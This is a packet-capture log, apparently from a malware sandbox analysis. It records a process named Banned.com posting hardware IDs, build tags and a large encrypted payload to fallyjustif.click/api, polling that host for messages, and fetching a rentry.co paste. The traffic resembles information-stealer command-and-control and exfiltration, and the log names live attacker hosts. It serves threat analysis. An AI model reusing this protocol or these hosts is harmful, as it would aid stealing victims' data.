2024-12-28 20:36:02 UTC	15331	OUT	Data Raw: 2d 2d 42 39 57 35 56 46 52 42 4a 35 56 4b 31 49 34 45 43 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 42 39 57 35 56 46 52 42 4a 35 56 4b 31 49 34 45 43 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 39 57 35 56 46 52 42 4a 35 56 4b 31 49 34 45 43 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c Data Ascii: --B9W5VFRBJ5VK1I4ECJKContent-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--B9W5VFRBJ5VK1I4ECJKContent-Disposition: form-data; name="pid"3--B9W5VFRBJ5VK1I4ECJKContent-Disposition: form-data; name="lid"MeHdy4--pl
2024-12-28 20:36:02 UTC	5114	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 Data Ascii: `M?lrQMn 64F6(X&7~
2024-12-28 20:36:03 UTC	1145	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 20:36:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t4q9638vme9obupgjfenl8riec; expires=Wed, 23 Apr 2025 14:22:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxeBKPsVgn%2BrZjTC2NdwZ2D28oyuPKm9M7nZe0ol%2FAKbH88J6fnfwfGCm7cnQ%2Bo0y%2FI%2BNvVKjzl0LQJG3yucoCMU7F52qFVMoxe%2BpkTgpfLON8gZy92%2Bn4%2BQ3%2FHQjkoB79asTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94571aecc78c77-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1855&min_rtt=1839&rtt_var=723&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21409&delivery_rate=1479979&cwnd=244&unsent_bytes=0&cid=60fc66e29968a78c&ts=992&x=0"
2024-12-28 20:36:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 20:36:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49759	104.21.37.209	443	7800	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 20:36:04 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=A34H4KFN0QJ82PVOT8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1226 Host: fallyjustif.click
2024-12-28 20:36:04 UTC	1226	OUT	Data Raw: 2d 2d 41 33 34 48 34 4b 46 4e 30 51 4a 38 32 50 56 4f 54 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 41 33 34 48 34 4b 46 4e 30 51 4a 38 32 50 56 4f 54 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 33 34 48 34 4b 46 4e 30 51 4a 38 32 50 56 4f 54 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 Data Ascii: --A34H4KFN0QJ82PVOT8Content-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--A34H4KFN0QJ82PVOT8Content-Disposition: form-data; name="pid"1--A34H4KFN0QJ82PVOT8Content-Disposition: form-data; name="lid"MeHdy4--pl1ne
2024-12-28 20:36:05 UTC	1134	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 20:36:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m6nq9c0466ck0j0947ls8cv4fb; expires=Wed, 23 Apr 2025 14:22:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rd182BdkxgQz%2BjC4%2FzlvrqCBXZPURxCgI7q8AVtH3Ft6T0CuYGyFx5cPqxiPyFl15QPhJTTvzyfMJ%2B87RZxoeaKxRgVIIz1Ois%2Fa1QW1YtL43%2Bl3Gy2b4FEboSYv6v40C3AOTQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94572a9ed67cf9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2011&rtt_var=759&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2144&delivery_rate=1452013&cwnd=211&unsent_bytes=0&cid=4e15efd4e9fd0a4c&ts=825&x=0"
2024-12-28 20:36:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 20:36:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49765	104.21.37.209	443	7800	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 20:36:07 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Z0LWSW34GXQ8HPHCEWP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 554711 Host: fallyjustif.click
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: 2d 2d 5a 30 4c 57 53 57 33 34 47 58 51 38 48 50 48 43 45 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 5a 30 4c 57 53 57 33 34 47 58 51 38 48 50 48 43 45 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 30 4c 57 53 57 33 34 47 58 51 38 48 50 48 43 45 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c Data Ascii: --Z0LWSW34GXQ8HPHCEWPContent-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--Z0LWSW34GXQ8HPHCEWPContent-Disposition: form-data; name="pid"1--Z0LWSW34GXQ8HPHCEWPContent-Disposition: form-data; name="lid"MeHdy4--pl
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: 94 a6 09 83 79 9a 8a f0 86 d0 fc 97 ce e3 da ff 56 f6 8c e0 4e e0 64 2d 2b 9e a1 0c d3 3d 4e a5 6a a5 f8 41 52 1b 3f 75 1d 63 e2 44 f7 b2 8d 1f 98 7c 0a 1c 0f a7 2a df 3f 8f 80 7a 43 94 86 c2 77 e3 86 01 4f 72 4c ac ff cf 65 84 7d 15 40 13 97 73 b3 2d fe 32 60 fb 24 1f 9d c6 56 10 33 5d a0 7b 1a 0b c4 ae a8 c3 4a f9 84 e4 10 df 82 b3 ce 82 02 01 d2 c4 f5 1b e3 27 e2 04 68 f3 c5 ea 53 f1 77 c2 ed 36 22 02 8e 85 ed 65 18 fd 21 64 eb ec 7c 10 65 1c 84 d7 07 25 1d 41 fe 93 79 10 9c 0d 55 4a e1 8f 34 c3 85 fb 81 83 56 27 20 57 f3 bc 05 91 ea 1b 97 16 05 6e fc db f2 71 c0 a5 6f ac ef 5d da 88 fd 90 d3 3b 74 a8 66 fd c6 55 2a 54 60 5f d1 61 52 72 35 31 c4 75 32 2d 0a 05 f7 ee f7 11 31 c2 84 22 d3 4e 0c 4d cb c1 80 24 ff 78 6a 2e 28 0e 76 74 59 73 68 d0 c0 4f 07 Data Ascii: yVNd-+=NjAR?ucD\|?zCwOrLe}@s-2`$V3]{J'hSw6"e!d\|e%AyUJ4V' Wnqo];tfUT`_aRr51u2-1"NM$xj.(vtYshO
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: 1f 98 90 0d 15 7c 93 bf 38 a6 1f c5 04 d9 76 73 30 61 95 ad 61 ee bc 97 73 9a a5 90 f2 91 23 f9 62 98 f7 98 66 e9 90 81 3c 1f 2b 39 a9 4b 4b ad 13 29 f5 12 5d 98 5a 2d 85 b7 ad c1 f8 80 e1 5a aa 09 f7 fb c7 f1 b8 b2 d1 c9 e9 e9 e8 3a fd 09 25 67 15 b0 d3 31 02 22 c8 ed c3 53 2d 03 89 2a 4a 8a 11 71 bf de 9f 38 26 1f 69 e0 d4 65 88 f3 3b ae c2 e7 c7 cb 57 eb ea e0 1e 35 96 fd 7a 97 41 e0 bf ab 66 3d 2d f0 aa 84 87 47 f3 f3 88 c7 a2 f9 85 d6 94 fa 96 84 76 36 c9 69 bf da a8 7d 14 47 90 43 09 ed c1 99 3c d4 5d 12 af 54 79 25 98 da 72 27 b4 76 4f fe a4 5c 3f ff 77 f5 ac c9 2b a3 bf cf 46 5f 4d 0f d9 c7 77 37 48 b4 8f da 6c f8 bc 31 1a f6 17 ff a5 58 3b 15 c2 8f fe c9 ec 5e 77 ba e2 f7 28 d3 10 d1 99 25 9a 95 db 22 2b b4 3e 1c 7b 6c 08 ea 8e da 12 79 ba a3 40 Data Ascii: \|8vs0aas#bf<+9KK)]Z-Z:%g1"S-*Jq8&ie;W5zAf=-Gv6i}GC<]Ty%r'vO\?w+F_Mw7Hl1X;^w(%"+>{ly@
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: a8 fc 90 c6 73 21 41 e2 c4 b4 48 0b 91 e1 8e eb dc 45 15 a0 73 3e b9 8a bb b5 81 5b ee 7b 75 ec f6 06 4a 1a d3 8c 5e de 7a 16 4b 15 63 97 dd dc 4d 8f b2 fe f4 6c ef 27 34 cc a8 5c 72 39 b0 f1 a2 5f a0 27 b3 e2 f3 48 4d c5 cb 7f 58 4c 6e 7e ec e9 ea a9 95 3f 4e 4c 6a f3 39 a1 ae b1 9f 5b bf a9 be c6 ee 36 af 38 d7 3e ed cf a4 e6 ed 05 8e c2 45 00 73 eb 34 70 bc b0 83 67 a7 4e af 6c a1 30 cb 6d 58 82 55 7a a0 8d c3 51 c7 87 db 7c 5d 7f 74 2f c2 6a 42 6e b2 40 1a c8 c6 84 dc f2 9a 87 e8 76 a1 f6 06 1f d4 f1 33 bd 6f c8 6d 26 4f c3 2d b4 80 c3 c7 5f 1b 88 8f 30 05 1e f2 ff df 11 e8 48 e6 28 04 ca d0 50 93 01 b8 56 96 8b 88 2c 89 48 cd 52 14 b8 10 f2 54 9b 6f 8d 2e ae 8a 7d f5 4a 71 48 eb 07 20 ec 21 3a 62 9e 61 89 5f 26 5d 3d b8 81 c5 4f 0c a3 54 50 20 f1 23 Data Ascii: s!AHEs>[{uJ^zKcMl'4\r9_'HMXLn~?NLj9[68>Es4pgNl0mXUzQ\|]t/jBn@v3om&O-_0H(PV,HRTo.}JqH !:ba_&]=OTP #
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: cc 32 4c a5 43 91 32 df 3f 44 62 b6 6c 04 b1 47 18 fc 1a 26 e5 26 fb 0c f7 0d e4 bc 2a 29 fb dc 3f 4d 94 83 28 4b 61 52 cf 38 e8 ff 45 85 cb f4 e5 79 2f 6d 7b 1a 61 9e 2f 23 5f bb 00 a6 12 e6 84 bc 9a df 63 c6 32 12 4d ed 89 ff 46 22 d0 d4 50 b1 3d d2 d8 79 94 27 da bc 1d 65 ee a4 f1 eb 32 fe a5 df d6 7b 10 dd 71 2e 80 d5 87 20 b1 8c 00 a6 6f 3a dd 66 cd cc ee 3c b9 7a 82 73 cd 00 8f 9f d2 0d fe 2a 19 88 e5 c1 08 63 7a 15 c6 d1 8c a8 a2 6e a3 39 d9 0f d6 8c 26 63 6c b8 50 a3 bc 95 7b a6 53 d2 e8 c8 f8 9d 99 a1 8a f8 cd 97 02 14 7e ce 9d d1 60 6c 3d a9 f6 3a 93 19 f1 f7 20 b9 4e 22 d2 b8 0e c1 0e 84 49 94 a3 2e 11 69 7d 68 46 5c b9 7a 3a 7c 8f 6f e9 29 9f 8a 64 b2 a5 7d 46 02 4e 48 70 3f a3 64 cf 2e 1d 2e e9 bb ac e9 8d 67 12 91 87 f9 4c aa 7e ac 34 69 dd Data Ascii: 2LC2?DblG&&)?M(KaR8Ey/m{a/#_c2MF"P=y'e2{q. o:f<zsczn9&clP{S~`l=: N"I.i}hF\z:\|o)d}FNHp?d..gL~4i
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: 1e dd d2 71 bf 8c 7a 27 21 8e d4 f7 82 87 ad f3 e8 d9 a7 29 66 86 03 13 47 63 76 55 ff 7d bf 1b 43 4a 52 33 95 e3 7e 24 ea 06 93 e2 48 df 1e 46 3d 3f 2c 2b 0a 1c 9b e4 86 22 75 be 7e 5b b2 4c af e8 68 8a e7 5c 11 16 ff f1 37 b7 c3 15 7b 07 0e f2 87 4e 60 42 fd 51 3f 16 70 b1 59 75 26 34 f3 b0 89 10 09 ce fc 93 c0 4a 2f 56 82 ca b5 71 b0 ec 9b 5e 51 98 bd 5b 06 36 c4 c0 2f b9 d8 f5 51 a2 83 6d af ce 12 ab eb bb 25 6c 2f bc f0 e2 e9 ff 0e d3 5c cf c0 de e1 92 16 a1 bf 42 ec 44 55 99 48 2a 6c 33 56 2b ca b2 5b 57 ab 7d 86 32 d4 fd 30 ef f5 c1 fd d9 67 2e a0 6f ae 31 ce ec cc 14 b9 0a dd a4 aa 6b 2e a3 67 d1 cb 39 33 36 47 c9 74 d6 92 2a 6d 0c 80 b7 68 c6 3c ab 8f 94 26 02 08 7b c4 a2 94 b8 d9 0d db 6b 83 ff ae 4b 8e d4 30 3b a7 7e 26 c8 1d 77 86 f7 81 06 95 Data Ascii: qz'!)fGcvU}CJR3~$HF=?,+"u~[Lh\7{N`BQ?pYu&4J/Vq^Q[6/Qm%l/\BDUHl3V+[W}20g.o1k.g936Gtmh<&{kK0;~&w
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: ad e7 20 30 72 c0 ea 15 61 79 e0 82 f7 1f cc 98 82 9b 2b 4b a1 96 3c 4a 1e c3 36 ff ef da b1 ff 39 6a 75 7a fb fc b7 1b d5 a4 74 65 c5 3f ed 22 8e 00 c3 a6 70 08 3b 8a 8b 9a 1c f1 d1 7a fe 71 2c de e5 4e e0 b7 23 8f 96 b6 32 bd 8c f7 89 6c 78 39 0a 28 54 f7 bc f4 c6 14 0d 5f c6 e1 11 df 7f a7 63 c7 8a 17 cc 49 fc 5f 37 db 11 75 40 da a9 ca e8 66 b6 79 aa ef 13 07 57 fe 49 dd 11 eb cc 83 28 12 84 09 a5 3d f6 c8 b1 f9 5a 08 cc 3e 0b 85 88 72 59 ca 90 a3 70 ef 49 8e d6 b9 34 ee bd 1e 74 4c 1f de e5 22 31 90 f7 7e a4 45 db a6 66 ad 68 96 87 5c c9 9a 66 e6 08 75 8a 86 bb 48 16 47 54 1f 01 16 a3 99 1a a8 ef d8 de bf b4 e1 8a 86 ab 38 48 ad 01 1b 7b 35 b2 1c b2 76 b4 97 00 3c 35 4e 10 71 28 04 cf 2a 76 ce ce 12 99 64 1d 1e fc 7e 85 52 b9 eb b6 12 73 64 82 65 29 Data Ascii: 0ray+K<J69juzte?"p;zq,N#2lx9(T_cI_7u@fyWI(=Z>rYpI4tL"1~Efh\fuHGT8H{5v<5Nq(*vd~Rsde)
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: 1a 61 df c7 2c 2b 81 09 5d 0d 41 37 69 58 47 5d 4d 8b 2b 67 27 91 8f 96 36 57 f4 b6 3e d9 aa 7d f3 cb 82 90 92 20 63 c5 36 e2 d1 c1 e1 fc 45 03 9b de ec e2 8e 76 74 db 1f 43 c1 20 f0 08 ca 70 d8 5b 7a a9 58 2e 65 c4 e5 d4 a6 34 c2 73 d9 39 d3 b8 09 7d 0a 11 1a 89 f5 42 aa 53 57 b3 53 77 bd c1 00 97 f3 eb 72 ac 78 67 bc 7c f0 77 5f 58 1b 5f 9c f4 cd 77 28 ff da 54 06 4b 6f c7 5e 16 91 d1 84 6e 92 55 44 30 15 7b 0d 12 36 aa 38 84 7b 39 a6 fb fb 47 a2 28 0a a3 b7 56 c9 95 c7 39 7a f5 d5 dc 94 7f 40 8f 22 a4 61 74 4c 6b a5 7a d9 c3 da 12 27 26 32 ac 3e 25 84 73 fb f8 93 0b ac 4a 07 a7 8e e4 1e 09 4d 3e 72 f2 fc bf d3 66 2c d2 ba e8 0e 3b a2 e4 1b 5b 6c db ac 5c d4 4a cf 69 28 23 db 27 71 e7 c5 a5 69 c3 d1 4f 76 d0 67 9e 27 f0 59 2c 98 17 ee 4b 3f 07 b4 16 0e Data Ascii: a,+]A7iXG]M+g'6W>} c6EvtC p[zX.e4s9}BSWSwrxg\|w_X_w(TKo^nUD0{68{9G(V9z@"atLkz'&2>%sJM>rf,;[l\Ji(#'qiOvg'Y,K?
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: 72 e9 04 c7 c9 5f cb 9c 7d ad cd c2 60 91 8d b0 02 03 0f f1 25 d9 d9 34 1d 1c d9 24 b6 ff ff 3f 31 e1 0c e0 b4 1d fd 80 2c ee 1c 6a 97 21 aa 43 3f f2 c7 3b df ad cb da f2 13 d5 e6 04 4d 01 20 81 95 4a 75 cf 53 23 2c e8 e9 19 a1 8f de 6d d0 1f 3a 31 e0 9b fe a4 b5 fb f3 c3 7c 33 41 de ad 79 fb 4f 46 d4 ff dd 12 13 04 21 3e 8b 8b 68 a0 8d bf 82 03 6f d1 85 02 a8 61 32 59 f2 9f e0 34 6d 9f c4 cd 63 35 96 c6 fc be 3a 08 06 0c 38 41 ce 91 a5 f6 a2 e8 01 0e 85 4a c3 5c c9 c3 fd 52 23 ae f1 d8 11 55 ba 00 46 9b e5 19 4d 0d 06 f8 f5 c7 ac b1 15 c0 a7 62 3e 78 5c e4 cd 56 dc be 69 2b 34 af 9d 0f 9f 99 33 55 73 e2 d4 e6 b3 8a 54 63 5e c1 31 f1 7b 10 6c d4 ad bf 7e c5 41 02 75 3d 61 02 02 37 08 b8 06 5c bd 72 54 c8 6e 2a 3f 80 70 d0 0a 71 6f e8 4e ae 5d 6b ce 2c d9 Data Ascii: r_}`%4$?1,j!C?;M JuS#,m:1\|3AyOF!>hoa2Y4mc5:8AJ\R#UFMb>x\Vi+43UsTc^1{l~Au=a7\rTn*?pqoN]k,
2024-12-28 20:36:07 UTC	15331	OUT	Data Raw: a1 11 d5 cd 3d e3 98 73 3b 9c dc 88 92 4b 4d f1 16 d1 88 b7 b0 78 a6 a5 70 25 59 84 b4 6b fd a6 91 f6 9a 83 7a 26 5f a4 f3 c8 c9 08 fa cb 9b 92 13 a6 96 9f a2 f9 37 f8 7c 08 e8 da eb 68 c2 19 fe 6b 92 82 8e f3 fa 34 81 af f6 ff f7 d2 1b eb 38 bd 93 99 10 1f 93 58 b6 d3 90 97 79 57 cd 4b 10 f1 c6 2c 7a ac 31 11 30 ec 8e 82 fc c3 33 2a 50 fe 2f 33 a6 bb c3 f0 c5 ab 5f 44 2b 77 de 2c 66 6b 20 20 f2 8b 6b ea 69 6f d6 d5 fc 70 46 42 fe 52 cd 84 cb 14 3c 51 db 44 aa 40 ab 0b 58 b6 ee 08 3d 0a c3 30 35 28 46 ad d0 14 e7 ed 7e 7d b9 48 25 65 02 c0 4e 8e de 71 fe c6 90 ef ec 40 4f 0f e9 03 ae f3 07 46 6b c2 7b 6e 0b 38 06 2d bc 9a b7 57 21 b6 d0 b3 3c 06 2b e5 06 4b ee ba e4 8b 2d 0c 84 49 45 7a 37 2b 77 8c 2d 15 6b d3 a3 a8 75 b3 1e 79 21 08 f7 02 c6 fe 5c 1f 7b Data Ascii: =s;KMxp%Ykz&_7\|hk48XyWK,z103*P/3_D+w,fk kiopFBR<QD@X=05(F~}H%eNq@OFk{n8-W!<+K-IEz7+w-kuy!\{
2024-12-28 20:36:09 UTC	1135	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 20:36:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9o647lv3a24bd4llkfibjqku5c; expires=Wed, 23 Apr 2025 14:22:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcFb4zhwrJ9g3qAUVkqQlPxUIufe9zpCDMN2oY8zTZZR4vMWVY9ohLMNwg3VaAtq2vJF8jZNAkvmX1hCI5IzG86b6M0A6D%2F4uuqrFi4iQgey3onMlkBW5e%2FvS3FoDc3DcUsdUQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9457399e3672a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1832&rtt_var=709&sent=311&recv=577&lost=0&retrans=0&sent_bytes=2841&recv_bytes=557216&delivery_rate=1519250&cwnd=194&unsent_bytes=0&cid=781f7c4ea0507220&ts=2439&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49774	104.21.37.209	443	7800	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 20:36:10 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 84 Host: fallyjustif.click
2024-12-28 20:36:10 UTC	84	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 26 6a 3d 26 68 77 69 64 3d 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl1new1&j=&hwid=FC32E3FE86DBE0A31441EDD8E05CE3DA
2024-12-28 20:36:11 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 20:36:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6p3ht9l1v0sg9kmfdq9n68c19d; expires=Wed, 23 Apr 2025 14:22:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R8l5xh0%2F8JVsI9ZqGZwres18w33Ea4qBqhNsH8eZ4QU6iRhyGDzljhL3EZKUjxprxiIuFhgtfijpkBMTB4H0xIiHLkmr8DloW0IKvvEMYf4wSbnUSUJAFrtQ0nYfoK3D7HnnjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9457516cec7277-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1975&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=985&delivery_rate=1427872&cwnd=225&unsent_bytes=0&cid=28a931d1e3cfb58b&ts=772&x=0"
2024-12-28 20:36:11 UTC	126	IN	Data Raw: 37 38 0d 0a 5a 6c 59 37 70 4d 39 41 68 55 38 76 53 2b 79 70 73 42 44 34 63 4b 6d 67 6c 54 64 49 31 55 52 69 50 30 6e 32 4e 31 67 79 57 5a 45 39 4c 52 6e 52 37 58 71 6e 4a 31 73 2f 6e 4e 71 4b 54 4e 63 73 68 74 4c 77 57 54 79 6e 50 55 78 63 4a 71 6f 59 50 6c 63 32 35 41 4d 68 58 70 47 54 62 2f 63 75 57 47 6e 41 69 39 5a 6b 32 6b 71 62 6a 4c 64 53 61 75 39 30 48 32 49 3d 0d 0a Data Ascii: 78ZlY7pM9AhU8vS+ypsBD4cKmglTdI1URiP0n2N1gyWZE9LRnR7XqnJ1s/nNqKTNcshtLwWTynPUxcJqoYPlc25AMhXpGTb/cuWGnAi9Zk2kqbjLdSau90H2I=
2024-12-28 20:36:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49779	104.26.3.16	443	7800	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 20:36:13 UTC	196	OUT	GET /feouewe5/raw HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: rentry.co
